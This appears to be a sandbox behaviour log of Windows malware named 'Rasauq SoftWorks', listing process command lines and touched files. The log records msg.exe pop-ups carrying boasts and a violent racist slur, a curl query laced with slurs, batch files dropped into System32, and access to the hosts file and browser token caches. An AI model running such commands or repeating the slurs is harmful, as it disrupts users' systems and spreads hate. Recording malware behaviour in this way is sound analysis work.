"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5352,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5368 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=5528,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=5888,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5880 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6832,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6888 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6860,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6948 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7284,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7432,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=7288 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10592,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=560 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10568,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10788 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=10784,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10864 /prefetch:8
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --always-read-main-dll --field-trial-handle=10448,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=10952 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --always-read-main-dll --field-trial-handle=9896,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11144 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=10996,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=11348 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --always-read-main-dll --field-trial-handle=5708,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5720 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --exception-pointers=112115826672576 --process=264 /prefetch:7 --thread=5540
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2248,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=9036 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=7972,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=6744 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=3956,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=8468 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=angle --use-angle=swiftshader-webgl --always-read-main-dll --field-trial-handle=13704,i,15504862534866253999,8946044802331815384,262144 --variations-seed-version --mojo-platform-channel-handle=5680 /prefetch:2
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
Network
Files
C:\Users\Admin\AppData\Local\Temp\Rasauq SoftWorks.exe
C:\Users\Admin\AppData\Local\Temp\sRasauq SoftWorks.exe
C:\Users\Admin\AppData\Local\Temp\Launch.bat
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s1xnc5ty.wik.ps1
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
C:\Users\Admin\AppData\Local\Temp\tmpB788.tmp.bat
C:\Users\Admin\AppData\Local\Temp\hig.bat
C:\Windows\System32\Rasauq\$77RasauqBroker.bat
C:\Windows\System32\Recovery\ReAgent.xml
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
C:\Windows\system32\drivers\etc\hosts
\??\pipe\crashpad_1488_SYAFXSXYECZQKNHM
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006f
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\Cache_Data\f_00006d
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DawnWebGPUCache\data_1